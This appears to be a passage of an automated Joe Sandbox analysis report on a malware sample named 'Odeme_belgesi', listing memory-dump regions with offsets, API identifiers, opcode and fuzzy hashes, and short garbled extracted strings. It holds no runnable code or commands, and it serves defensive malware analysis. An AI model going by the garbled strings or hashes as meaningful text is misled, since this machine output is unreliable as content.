                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 666dd101298a46b01c231f0fbec385c5f1955fd539092bbd69ee4259ebc0c89b
                • Instruction ID: 276c8ba0feaf9008c654530396566a3357479a0e5226e8ebb978e97899f432fd
                • Opcode Fuzzy Hash: 666dd101298a46b01c231f0fbec385c5f1955fd539092bbd69ee4259ebc0c89b
                • Instruction Fuzzy Hash: CB3198B9D042589FCF10CFA9D984AEEFBF5BB19310F14902AE819B7210D379A945CF64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 65c0fabb0505104867a9a656b5cde27c0ab96f2c1c4169b7d6154f64882b5320
                • Instruction ID: 0ad902efa64dc1adbc967365ccd47576a80cedfccfe959ff3c99f54009a9558d
                • Opcode Fuzzy Hash: 65c0fabb0505104867a9a656b5cde27c0ab96f2c1c4169b7d6154f64882b5320
                • Instruction Fuzzy Hash: 97F07F70D1125C9BCF20CF65C980ADDBBB5FB2A345F10519AD649AA221D7306A91DF44
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 076ca8f50389740e74cc9afba0086bd8ba9dd4b9561046e2f0274b707d37fbf6
                • Instruction ID: 4693c6aa5d8f25ffbb06d6de476dbd507ae018b5420fe65e640b17773f365ff3
                • Opcode Fuzzy Hash: 076ca8f50389740e74cc9afba0086bd8ba9dd4b9561046e2f0274b707d37fbf6
                • Instruction Fuzzy Hash: E641D5B4E15209DFCB44DFA9C8815AEFBF2EF89300F10956AD819A7365E7349A42CF50
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ec32be91506b0c0e0afc734a681c6c39021d557cefa45e86f1addea4814fdfa0
                • Instruction ID: 61b78c1671f55654146a5af04fe69c6593ade1c288d8c2bb5d7bdfea157e690b
                • Opcode Fuzzy Hash: ec32be91506b0c0e0afc734a681c6c39021d557cefa45e86f1addea4814fdfa0
                • Instruction Fuzzy Hash: 9831B574E05209DFCB44DFDAC8815AEFBF2EF88300F50956A9819A7324E734AA52CF50
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 58b9e2d0eaf601cb0d0a59819431f86caae4de92679702a640b18e17b17cba64
                • Instruction ID: e6a2c92019ad318b6279b384c0cdeb2e46d20bc4932171b34d0ea6493bb3132b
                • Opcode Fuzzy Hash: 58b9e2d0eaf601cb0d0a59819431f86caae4de92679702a640b18e17b17cba64
                • Instruction Fuzzy Hash: F3313974E04208EFDB04DFA9D54499EFBF2EF89310F15D4A9D5089B365E730AA52CB40
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 70e45b484c18b4a076b46afd7ace4c049b4d8a142fb421d35438e09de6fc94c5
                • Instruction ID: e8bf4f74e683e060c875979b7d5f82e21d12bd542cfb19c82280b051618ccdba
                • Opcode Fuzzy Hash: 70e45b484c18b4a076b46afd7ace4c049b4d8a142fb421d35438e09de6fc94c5
                • Instruction Fuzzy Hash: 1831F670E04249DFCB04DFA9D98059EFBF2BF88300F1485A9C519A7325E7349A428F51
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1754f5af3156cf249eee3863173776230b820db834be1caa51e4c24e3f0b7aba
                • Instruction ID: 2c03b1f68852049bd34739f1aa13e0bc3e850b943874e4ad0603d92e322e63c8
                • Opcode Fuzzy Hash: 1754f5af3156cf249eee3863173776230b820db834be1caa51e4c24e3f0b7aba
                • Instruction Fuzzy Hash: 04219D70E04209EFDB04DF69D8405AEFBF2EF89340F14D4AAD108EB2A5E7309A46CB40
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f6c4184a6d5008c983d9bf58d228c7ce9df7ae82c0ce8123bf6edca0ae21c1d0
                • Instruction ID: 99c95acf5dec46d170917ae2a04c6193920156a7a1cf920b04ff1090e0e93145
                • Opcode Fuzzy Hash: f6c4184a6d5008c983d9bf58d228c7ce9df7ae82c0ce8123bf6edca0ae21c1d0
                • Instruction Fuzzy Hash: E6018074E10209DFCB04DFB5E94815EFBB1FF89201F14D8A5861AE7224E7309A959B11
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7cbdecc27225238443af825f8d9203a447861ad27473fe46403f1c27e825a79f
                • Instruction ID: 23ca45784ffb94871de602e0f9daf2db28731a80897268eb0a15fc428d5ddbe7
                • Opcode Fuzzy Hash: 7cbdecc27225238443af825f8d9203a447861ad27473fe46403f1c27e825a79f
                • Instruction Fuzzy Hash: 12018074E10205DFCB04EFB4E54815EFBB2FF89201F14D8A58509EB224EB308AA49B41
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fd3f71c993f32c1f82e027040159557ec73cad9cd78f3a8b653db515d061aa4
                • Instruction ID: fd9bddbfd604b9176be59a087e2fb068ad57c44206d4f453411ce8c74ddaba88
                • Opcode Fuzzy Hash: 0fd3f71c993f32c1f82e027040159557ec73cad9cd78f3a8b653db515d061aa4
                • Instruction Fuzzy Hash: CE01E278E00248AFCB05DBB9C599A9DBFF2EF49310F09C1D9D8489B362E6319956CF41
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48d61265a3fb5add342a014cdb5ca07ff2cdc70376e908e8d9d481957d8a1978
                • Instruction ID: 6e002739b7390d286fbc51f0fb48f55a0477893da2f8920606436fd94167ab65
                • Opcode Fuzzy Hash: 48d61265a3fb5add342a014cdb5ca07ff2cdc70376e908e8d9d481957d8a1978
                • Instruction Fuzzy Hash: 3401AF78E00208EFCB04DFA9D588A9EBFF1AF48310F05C1A999089B365EA31A951CF41
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bdf25f03debcf75866db8c9cab3a37b5adbaeeec56b6bfe7210787872504c96e
                • Instruction ID: 49f0f4f44bafbdbc96f0db2ec5e1b053493ecd63f098d7932b70aca13cad449d
                • Opcode Fuzzy Hash: bdf25f03debcf75866db8c9cab3a37b5adbaeeec56b6bfe7210787872504c96e
                • Instruction Fuzzy Hash: 4BF05F74912218CFCBA1CF54D880ADDBBB1EB19311F1051D5A449A7220DA31AEC1CF40
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 95f81598785136c4a10610d018ebb71ede1aa78e432c8a6f42f9e884f90e7d2a
                • Instruction ID: 8de0fb179aaf1e745a7868e3d50c97dbfd3fc0ebcae16a9a7808de4d4c49ebf4
                • Opcode Fuzzy Hash: 95f81598785136c4a10610d018ebb71ede1aa78e432c8a6f42f9e884f90e7d2a
                • Instruction Fuzzy Hash: 1EE07E74E10208EFCB84DFA9D448A9DBBF4AB08600F5081AA9918D7361E634AA50CF51
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02b1017f5abb8175a1bc24c8ea47417487c85cf5d98080fa19001ac45059d4d4
                • Instruction ID: e95af5a793d5cfd68ff02cb4d27a2f7c3579ae305d1e7ddb965058ac02fb8d59
                • Opcode Fuzzy Hash: 02b1017f5abb8175a1bc24c8ea47417487c85cf5d98080fa19001ac45059d4d4
                • Instruction Fuzzy Hash: FBF04E78A562598FCB55CF98CA90ADDBBF1EF48300F1150D5A409EB355D734AB81CF11
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 082463e496f688b8a5991176fbb65b633ef5c416aea0efbd2faa4b75b14c34d3
                • Instruction ID: ec5113f222da6985ba9bdef542d7870d34318edd9bb5c8cbcfb4ab9d7aa77ea9
                • Opcode Fuzzy Hash: 082463e496f688b8a5991176fbb65b633ef5c416aea0efbd2faa4b75b14c34d3
                • Instruction Fuzzy Hash: 04D0A930809282DB8F10CF94DA85189BBB0EF8035031660A2C86A9F27DD330C682CE60
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 22d73f09766828c78005b3f8482176e61cc9432de0137934729fa7ee66ec70df
                • Instruction ID: 6f912239c5faa1913c3952369726d824c65acc026ffb3ce8c2afb7e976afd4ac
                • Opcode Fuzzy Hash: 22d73f09766828c78005b3f8482176e61cc9432de0137934729fa7ee66ec70df
                • Instruction Fuzzy Hash: D3C01275D081588BDB00CF54C94079DB7B5AF45300F1090954208B3248D6306B018F1A
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8195c75b282fe7500c6d30ffb58bb383fbefa3ccad3cd8993adbd112b66faa15
                • Instruction ID: 215ccb3512a934b64ff389e0f77a5ef0d66b416ec5423c675ce35772a3c46c4d
                • Opcode Fuzzy Hash: 8195c75b282fe7500c6d30ffb58bb383fbefa3ccad3cd8993adbd112b66faa15
                • Instruction Fuzzy Hash: 25D092B4A05219DBDB04DB68C980B99F6B5FF44200F009A95E018A7124E330A9418F50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: 0v=3$0v=3$;F'<
                • API String ID: 0-2152073175
                • Opcode ID: 70d86527a6ded260922256bb6362cfef44f7e1cfb051bbb505c8ac55cf41a8e9
                • Instruction ID: e54ece00db272ca3652bf9f762601c4d8a6a50d52c9cc47fd98f94caab014bd5
                • Opcode Fuzzy Hash: 70d86527a6ded260922256bb6362cfef44f7e1cfb051bbb505c8ac55cf41a8e9
                • Instruction Fuzzy Hash: 77912BB5E00209DFCB04CF99D8809EEFBB2FF88310F148566D915A7255E370AA46CF94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: Ahm$)u%7$v:q
                • API String ID: 0-3741568569
                • Opcode ID: bfc6a9c9a662e21cb846a31809fded2884bafb19407f543f3c3bcc29e25073bc
                • Instruction ID: 0d8f76ce0f2c0ba417b21028298284e83bc3d357ebc64ffd43435e651c43a6f0
                • Opcode Fuzzy Hash: bfc6a9c9a662e21cb846a31809fded2884bafb19407f543f3c3bcc29e25073bc
                • Instruction Fuzzy Hash: 7C313771E056289BDB68CF2ADC407DAFBB7ABC9300F14C0BAD51CA7214DA304A969F50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: X~q
                • API String ID: 0-3853671786
                • Opcode ID: d889e53c5631985bb3c863b1e27f8aaa9da1c021ed7f2cc27e939a9584a013a0
                • Instruction ID: 7a31a3bab7ce93b4785ee1738a23c2b37de3618577915bd1c718be19f0cdb3f7
                • Opcode Fuzzy Hash: d889e53c5631985bb3c863b1e27f8aaa9da1c021ed7f2cc27e939a9584a013a0
                • Instruction Fuzzy Hash: EDB18630B1A256DBDB749EB9844433BBBB6AF84741F25492EDC82D72C9CE34C8428B55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: cE[T
                • API String ID: 0-1271912872
                • Opcode ID: 218e869e03c48f2d63800114a313b663707af7877fb9307fbc7b77434b896ad8
                • Instruction ID: 44e44847e01587ed97d3215ad135d4eac4323156a95c6c533ed3e8de1c20af23
                • Opcode Fuzzy Hash: 218e869e03c48f2d63800114a313b663707af7877fb9307fbc7b77434b896ad8
                • Instruction Fuzzy Hash: B98102B5E11209CFCB44CFA9C98499EFBF1FF89250F24856AD519AB320D770AA42CF51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: cE[T
                • API String ID: 0-1271912872
                • Opcode ID: b8dbfd98bac89a989bcfd0cb87fd6138b557e4123594bbc6803ab34e2beb8178
                • Instruction ID: 3b1f389ee6ab3f0e34e160edc5ec6c762975acaed70b90d5fbeec32566c1da3d
                • Opcode Fuzzy Hash: b8dbfd98bac89a989bcfd0cb87fd6138b557e4123594bbc6803ab34e2beb8178
                • Instruction Fuzzy Hash: D381E0B5E11219CFCB04CFA9C98499EFBF1FF88250F248569E519AB324D770AA42CF51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: ( Wd
                • API String ID: 0-3282727167
                • Opcode ID: a559e15818e0b7aa6d6d84c79f78709a0b65929eaaa9848adad829da9fd53bc1
                • Instruction ID: e5d3be4f43d16baeb389e0de63460261c703e6d70787727f9a479ab5d339a325
                • Opcode Fuzzy Hash: a559e15818e0b7aa6d6d84c79f78709a0b65929eaaa9848adad829da9fd53bc1
                • Instruction Fuzzy Hash: 3E41FAB5E0560A9FCB44CFAAC5805EEFBB2EF88300F14C469C519A7255E730AA42CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: ( Wd
                • API String ID: 0-3282727167
                • Opcode ID: b36291a12beade06855014d99117c3e3bda4a6848aaa49acea62518aa742e8aa
                • Instruction ID: cafc4d9db75418044a24ee2079420f3228d10ee48cf4d1a5705d6827ec93b34c
                • Opcode Fuzzy Hash: b36291a12beade06855014d99117c3e3bda4a6848aaa49acea62518aa742e8aa
                • Instruction Fuzzy Hash: 8741C9B5E0521ADBCB44CFAAC5405AEFBF2AF88300F14C569C519B7254E734AA42DBA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: R}T/
                • API String ID: 0-1768900159
                • Opcode ID: 89d114c30a7e8bc48fba211df3f97b95d467b4c72ac310d788620f0e05c5486c
                • Instruction ID: 743a1e56cee5eb99632866521b194ba649768ee5d46a3d89b3fd4df19489a041
                • Opcode Fuzzy Hash: 89d114c30a7e8bc48fba211df3f97b95d467b4c72ac310d788620f0e05c5486c
                • Instruction Fuzzy Hash: 20313F71E065189BDB68CF2AD8443D9F7B3ABC9310F14C0BAC54DA7214EA314A969F10
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: IYQ
                • API String ID: 0-2710507113
                • Opcode ID: cc901c4cd18f1c0858e74231ed06ae87ac776888b511325aa25b3710821d5d6b
                • Instruction ID: c020b109a8bae0a0d0667e82d986cf7be12fc2d08acbd2f2dccca41683bb5198
                • Opcode Fuzzy Hash: cc901c4cd18f1c0858e74231ed06ae87ac776888b511325aa25b3710821d5d6b
                • Instruction Fuzzy Hash: 423171B1E00628CBEB58CF6AD84469DBBF2BF88201F14C1AAD91DA7255EB3019958F50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: IYQ
                • API String ID: 0-2710507113
                • Opcode ID: 5deec1f8abe75bd85ad68560ac43dc3937b5c78be4e7c80e8df067e5d9497a3a
                • Instruction ID: 363a1c83d0dc6368d236dabdae109cc8b1b7df564d70d796fab8b9438ee32e5e
                • Opcode Fuzzy Hash: 5deec1f8abe75bd85ad68560ac43dc3937b5c78be4e7c80e8df067e5d9497a3a
                • Instruction Fuzzy Hash: D13162B1E006588FEB58CF7AD84469DBBF3BFC9200F54C1AAD919A7255DB301986CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: p
                • API String ID: 0-2181537457
                • Opcode ID: df4f5cef078f20d79b3385e4011e24142f0bc2cebff8ebcc1a195a6d57f766eb
                • Instruction ID: 59461c73e628851bb0eb9995b7cb83d524d24e571b1877d906da08774ecd3be9
                • Opcode Fuzzy Hash: df4f5cef078f20d79b3385e4011e24142f0bc2cebff8ebcc1a195a6d57f766eb
                • Instruction Fuzzy Hash: 3331DA75E04658CFDB18CF6BD84069EFBB3AFC9200F14C0AAD909A6254DB341A468F51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: P
                • API String ID: 0-3110715001
                • Opcode ID: 8f3da96097bc4a94d35059bfc7f7c58ac9239323b5d77f681d362da1bed35aea
                • Instruction ID: e17bc5b44a9116e80f0c4b5d9af5be41a5d640826ea7257ae07b3cfa9bcc4900
                • Opcode Fuzzy Hash: 8f3da96097bc4a94d35059bfc7f7c58ac9239323b5d77f681d362da1bed35aea
                • Instruction Fuzzy Hash: E121D8B1E046188BEB18CF6BDC4469EFBF3AFC9300F04C0BAC918A6265EB3455568F55
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c80208eb0304663fdfff36d5327f5b86a42ad234ddef200f7aa82584516c5cc
                • Instruction ID: 8ccca3c72b4f7437bee9e9e027da73e1d230e713eda04c96fc5fb67cd4382327
                • Opcode Fuzzy Hash: 6c80208eb0304663fdfff36d5327f5b86a42ad234ddef200f7aa82584516c5cc
                • Instruction Fuzzy Hash: 2BB12B75E0420ACFCB04CFA9C9805EEBBF2FF89310F14956AD515B7224E734AA46CB95
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc3c324fe1d862ded1a110a4e6df60c417a6ff4fb721a4324091403355de040f
                • Instruction ID: 7508ff74f1b3e60d43224f4e29070455c80eb3603bfb4a433065466d06cb885d
                • Opcode Fuzzy Hash: dc3c324fe1d862ded1a110a4e6df60c417a6ff4fb721a4324091403355de040f
                • Instruction Fuzzy Hash: B7C12C78E14219DBCB14DFA9C5809AEFBB2BF89304F24C569D419AB356D730AE41CF60
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb67432dee8d94b7d3c2dfe9daeda2720483791a39be090d386f05f359d1942a
                • Instruction ID: 0635a7dc3b105fbe53486acc5a2d8bf55f589c52d88052c0aeaba2e72692c8ab
                • Opcode Fuzzy Hash: cb67432dee8d94b7d3c2dfe9daeda2720483791a39be090d386f05f359d1942a
                • Instruction Fuzzy Hash: 73A11A75E05209DFCB04CFA9C9805EEFBF2AF89310F24956AD505B7224E334AA42CB55
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: af3da038fd8ae942e5d7fb30b2eb6d09c462a24fc76eb9609341da0a64b12045
                • Instruction ID: 87841d4c949ac1600d5c0afc8738024ff6a40fa97f27623a2257b6654c20c12d
                • Opcode Fuzzy Hash: af3da038fd8ae942e5d7fb30b2eb6d09c462a24fc76eb9609341da0a64b12045
                • Instruction Fuzzy Hash: E78106B5E05209DFCB04DFA9D9809AEFBF1FF89310F14956AD515AB220D374AA42CF90
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df3229e743aa72b0d8c594522cc6bfcc354df30da507edc446577954473fb48d
                • Instruction ID: e718f0dfd865766ad8c9b6d5f55bb68ea967fac28c2e0ab1bebdeac376f82fbb
                • Opcode Fuzzy Hash: df3229e743aa72b0d8c594522cc6bfcc354df30da507edc446577954473fb48d
                • Instruction Fuzzy Hash: F881FF75A1421ACFCB14CFA9C98499EBBF2FF88310F148569D415BB325D730AA42CF90
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 56c4c1239fc1a7f20aa513df0dfffe1d4cdb8377c5f31ebaf6e0d913b28d74de
                • Instruction ID: 2ca8a48593b59f6b5980e4be731f59b971cf6ebecb685d9b015dedf52f87d333
                • Opcode Fuzzy Hash: 56c4c1239fc1a7f20aa513df0dfffe1d4cdb8377c5f31ebaf6e0d913b28d74de
                • Instruction Fuzzy Hash: D981F075E1520ACFCB14CFA9C98499EBBF1FF88310B14956AD415BB365D730AA42CF90
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32e60c697c78be5c63a39b2b41467b916e08c7d8ec8174611a7f0e98c659d82f
                • Instruction ID: ae0fc43b319feeb9e42ddf96d69a3f07b2893468f0b73e7b517c6844f3bcbe91
                • Opcode Fuzzy Hash: 32e60c697c78be5c63a39b2b41467b916e08c7d8ec8174611a7f0e98c659d82f
                • Instruction Fuzzy Hash: 26813EB4E15219DFDB14CFA9C980A9EFBB2FF88304F248169D509A7365D730A942CF60
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: efd064884e0e825c945c971350bc7cbbb39758ad8ce123057f4cdb32639dcb54
                • Instruction ID: 895e1f2961ae4a0e1a511d9e13bdbbc873073af7f8fbd4c1a04945cde0550022
                • Opcode Fuzzy Hash: efd064884e0e825c945c971350bc7cbbb39758ad8ce123057f4cdb32639dcb54
                • Instruction Fuzzy Hash: 3E71E278E11209DFCB04CFA9D48499EFBF2EF89314F64956AE419EB224D7349A41CF50
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a75cecd5e981bd5dbdd6b527aedaf4289c58d38f857a9fada8c8b2aa5b39942f
                • Instruction ID: 59d8e90afc89d050122239548792ffd914d07a950e5c4b66b484d3644b04f99a
